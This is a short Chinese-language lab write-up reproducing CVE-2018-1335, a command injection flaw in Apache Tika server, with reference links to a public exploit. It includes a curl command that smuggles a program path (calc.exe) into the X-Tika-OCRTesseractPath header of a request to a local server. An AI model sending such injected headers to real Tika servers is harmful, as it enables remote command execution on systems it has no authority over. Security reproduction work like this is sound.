CVE-2018-1335 Apache Tika 命令注入漏洞复现

本文将介绍的是Apache tika-server命令注入漏洞到实现攻击的一系列步骤。该漏洞编号为CVE-2018-1335。

下载环境源码

https://archive.apache.org/dist/tika/

使用命令行启动

java -jar tika-server-1.17.jar

漏洞发生原因是因为OCR全名为Optical Character Recognition（光学字符识别），用于提取出图像中的文本和内容信息。这里，我将上传图像文件而不是docx，希望它能与doOCR函数交互。

curl -T test.tiff http://localhost:9998/meta --header "X-Tika-OCRTesseractPath: "calc.exe""

我们使用已经公开的利用脚本测试一下

https://github.com/RhinoSecurityLabs/CVEs/tree/master/CVE-2018-1335

在注入其他程序的时候，例如cmd无法弹出，经过分析应该是cmd调用的时候会终端挂起，所以比较难以利用。

测试了一下，其他系统默认自带的程序，也是可以的

参考文章

https://rhinosecuritylabs.com/application-security/exploiting-cve-2018-1335-apache-tika/

https://github.com/RhinoSecurityLabs/CVEs/tree/master/CVE-2018-1335